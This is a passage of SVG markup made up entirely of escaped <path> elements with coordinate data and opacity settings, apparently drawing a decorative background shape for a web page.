d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n          opacity=\"0.1\"></path>\n        <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" 